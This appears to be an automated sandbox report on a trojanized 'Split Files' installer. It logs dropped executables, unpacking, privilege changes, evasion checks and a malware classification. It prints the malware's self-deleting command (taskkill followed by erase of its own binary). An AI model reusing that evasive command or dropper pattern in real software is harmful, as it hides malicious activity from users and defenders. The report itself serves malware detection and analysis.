                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_00402F205_2_00402F20
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_004150D35_2_004150D3
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_004153055_2_00415305
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_004223A95_2_004223A9
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_004195105_2_00419510
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_004048405_2_00404840
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_004268505_2_00426850
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_00410A505_2_00410A50
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_0042AB9A5_2_0042AB9A
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_00421C885_2_00421C88
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_0042ACBA5_2_0042ACBA
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_00447D2D5_2_00447D2D
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_00428D395_2_00428D39
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_00404F205_2_00404F20
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_1000F6705_2_1000F670
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_1000EC615_2_1000EC61
                Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\KN38AzDG.exeCode function: 6_2_0010AE8D6_2_0010AE8D
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: String function: 004035DC appears 90 times
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: String function: 00408CA0 appears 42 times
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: String function: 00403548 appears 61 times
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: String function: 00446194 appears 58 times
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: String function: 00445EC4 appears 43 times
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: String function: 004037CC appears 193 times
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: String function: 0043477C appears 32 times
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: String function: 00455D54 appears 48 times
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: String function: 00407988 appears 33 times
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: String function: 00455B64 appears 86 times
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: String function: 00451DE8 appears 62 times
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: String function: 00405A9C appears 92 times
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: String function: 10003C50 appears 34 times
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: String function: 0040F9E0 appears 54 times
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_00423C4C NtdllDefWindowProc_A,4_2_00423C4C
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_004126A0 NtdllDefWindowProc_A,4_2_004126A0
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_00455514 PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,4_2_00455514
                Source: is-DTRND.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                Source: is-DTRND.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows
                Source: is-DTRND.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                Source: is-AGVDF.tmp.4.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                Source: is-AGVDF.tmp.4.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows
                Source: is-AGVDF.tmp.4.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                Source: file.exe, 00000001.00000000.288145958.0000000000417000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename" vs file.exe
                Source: file.exe, 00000001.00000003.289316432.00000000020FD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe
                Source: file.exe, 00000001.00000003.289316432.00000000020FD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename6 vs file.exe
                Source: file.exe, 00000001.00000003.288963142.00000000022D9000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe
                Source: file.exe, 00000001.00000003.288963142.00000000022D9000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename6 vs file.exe
                Source: file.exeBinary or memory string: OriginalFilename" vs file.exe
                Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\Split Files\is-AGVDF.tmp 1E95FE5D06884DF82D2BEAEDA09434ECAC2A347AEC5F03E71F20E39FB6C9E0E9
                Source: SplitFiles131.exe.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_SYSHEAP, IMAGE_SCN_MEM_PURGEABLE, IMAGE_SCN_MEM_16BIT, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp "C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp" /SL4 $902D6 "C:\Users\user\Desktop\file.exe" 1818498 170496
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpProcess created: C:\Program Files (x86)\Split Files\SplitFiles131.exe "C:\Program Files (x86)\Split Files\SplitFiles131.exe"
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeProcess created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\KN38AzDG.exe
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "SplitFiles131.exe" /f & erase "C:\Program Files (x86)\Split Files\SplitFiles131.exe" & exit
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "SplitFiles131.exe" /f
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp "C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp" /SL4 $902D6 "C:\Users\user\Desktop\file.exe" 1818498 170496 Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpProcess created: C:\Program Files (x86)\Split Files\SplitFiles131.exe "C:\Program Files (x86)\Split Files\SplitFiles131.exe" Jump to behavior
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeProcess created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\KN38AzDG.exe Jump to behavior
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "SplitFiles131.exe" /f & erase "C:\Program Files (x86)\Split Files\SplitFiles131.exe" & exitJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "SplitFiles131.exe" /f Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0040910C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,6CF44E70,1_2_0040910C
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_00453D80 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,6CF44E70,4_2_00453D80
                Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;SplitFiles131.exe&quot;)
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeFile created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}Jump to behavior
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmpJump to behavior
                Source: classification engineClassification label: mal96.troj.evad.winEXE@12/39@0/5
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_00401B30 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,5_2_00401B30
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_004547A0 GetModuleHandleA,6CAD5550,GetDiskFreeSpaceA,4_2_004547A0
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_00402BF0 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,5_2_00402BF0
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_00405350 CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,FindCloseChangeNotification,5_2_00405350
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5272:120:WilError_01
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_0040B090 FindResourceA,FreeResource,4_2_0040B090
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpFile created: C:\Program Files (x86)\Split FilesJump to behavior
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCommand line argument: `a}{5_2_004096F0
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCommand line argument: MFE.5_2_004096F0
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCommand line argument: ZK]Z5_2_004096F0
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCommand line argument: ZK]Z5_2_004096F0
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpWindow found: window name: TMainFormJump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: file.exeStatic file information: File size 2094367 > 1048576

                Data Obfuscation

                barindex
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeUnpacked PE file: 5.2.SplitFiles131.exe.400000.0.unpack
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeUnpacked PE file: 5.2.SplitFiles131.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R;.ave131:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00406594 push 004065D1h; ret 1_2_004065C9
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00404159 push eax; ret 1_2_00404195
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00404229 push 00404435h; ret 1_2_0040442D
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004042AA push 00404435h; ret 1_2_0040442D
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00404327 push 00404435h; ret 1_2_0040442D
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00408BDC push 00408C0Fh; ret 1_2_00408C07
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0040438C push 00404435h; ret 1_2_0040442D
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00407F3C push ecx; mov dword ptr [esp], eax1_2_00407F41
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_00409A20 push 00409A5Dh; ret 4_2_00409A55
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_0040A107 push ds; ret 4_2_0040A108
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_004302D0 push ecx; mov dword ptr [esp], eax4_2_004302D5
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_004063C0 push ecx; mov dword ptr [esp], eax4_2_004063C1
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_004785C8 push 00478673h; ret 4_2_0047866B
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_00410798 push ecx; mov dword ptr [esp], edx4_2_0041079D
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_004129F0 push 00412A53h; ret 4_2_00412A4B
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_0045AA9C push ecx; mov dword ptr [esp], eax4_2_0045AAA1
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_00450EB4 push 00450EE7h; ret 4_2_00450EDF
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_0040D0F0 push ecx; mov dword ptr [esp], edx4_2_0040D0F2
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_00443530 push ecx; mov dword ptr [esp], ecx4_2_00443534
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_004055BD push eax; ret 4_2_004055F9
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_0040F650 push ecx; mov dword ptr [esp], edx4_2_0040F652
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_0040568D push 00405899h; ret 4_2_00405891
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_0040570E push 00405899h; ret 4_2_00405891
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_004057F0 push 00405899h; ret 4_2_00405891
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_0040578B push 00405899h; ret 4_2_00405891
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_00479B20 push ecx; mov dword ptr [esp], ecx4_2_00479B25
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_00419CF0 push ecx; mov dword ptr [esp], ecx4_2_00419CF5
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_004311AD push esi; ret 5_2_004311B6
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_0040F4BB push ecx; ret 5_2_0040F4CE
                Source: SplitFiles131.exe.4.drStatic PE information: section name: .ave131
                Source: initial sampleStatic PE information: section name: .text entropy: 7.2455087113234224
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpFile created: C:\Users\user\AppData\Local\Temp\is-D5FV2.tmp\_isetup\_setup64.tmpJump to dropped file
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpFile created: C:\Users\user\AppData\Local\Temp\is-D5FV2.tmp\_iscrypt.dllJump to dropped file
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeFile created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\KN38AzDG.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpFile created: C:\Program Files (x86)\Split Files\SplitFiles131.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpFile created: C:\Program Files (x86)\Split Files\unins000.exe (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpFile created: C:\Program Files (x86)\Split Files\is-AGVDF.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpFile created: C:\Users\user\AppData\Local\Temp\is-D5FV2.tmp\_isetup\_shfoldr.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_00423CD4 IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,4_2_00423CD4
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_00423CD4 IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,4_2_00423CD4
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_00478118 IsIconic,GetWindowLongA,ShowWindow,ShowWindow,4_2_00478118
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_0042425C IsIconic,SetActiveWindow,4_2_0042425C
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_004242A4 IsIconic,SetActiveWindow,SetFocus,4_2_004242A4
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_0041844C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,4_2_0041844C
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_00422924 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,4_2_00422924
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_00417660 IsIconic,GetCapture,4_2_00417660
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_00417D96 IsIconic,SetWindowPos,4_2_00417D96
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_00417D98 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,4_2_00417D98
                Source: C:\Users\user\Desktop\file.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe TID: 996Thread sleep count: 31 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_1-5522
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-D5FV2.tmp\_isetup\_setup64.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpDropped PE file which has not been started: C:\Program Files (x86)\Split Files\unins000.exe (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpDropped PE file which has not been started: C:\Program Files (x86)\Split Files\is-AGVDF.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-D5FV2.tmp\_isetup\_shfoldr.dllJump to dropped file
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_5-35022
                Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\KN38AzDG.exeAPI coverage: 9.8 %
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: __Init_thread_footer,GetUserNameA,GetUserNameA,__Init_thread_footer,GetUserNameA,__Init_thread_footer,GetUserNameA,GetForegroundWindow,GetWindowTextA,Sleep,Sleep,GetForegroundWindow,GetWindowTextA,5_2_004056A0
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00409764 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,1_2_00409764
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_0046CA68 FindFirstFileA,FindNextFileA,FindClose,4_2_0046CA68
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_00474A14 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,4_2_00474A14
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_0045157C FindFirstFileA,GetLastError,4_2_0045157C
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_0045E244 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,4_2_0045E244
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_0048AC5C FindFirstFileA,6CAD69D0,FindNextFileA,FindClose,4_2_0048AC5C
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_00472CD4 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,4_2_00472CD4
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_0045CDA4 FindFirstFileA,FindNextFileA,FindClose,4_2_0045CDA4
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_0045DEB0 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,4_2_0045DEB0
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_00404490 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,5_2_00404490
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_00423E2D FindFirstFileExW,5_2_00423E2D
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_1000959D FindFirstFileExW,5_2_1000959D
                Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\KN38AzDG.exeCode function: 6_2_00104A1A FindFirstFileExW,6_2_00104A1A
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
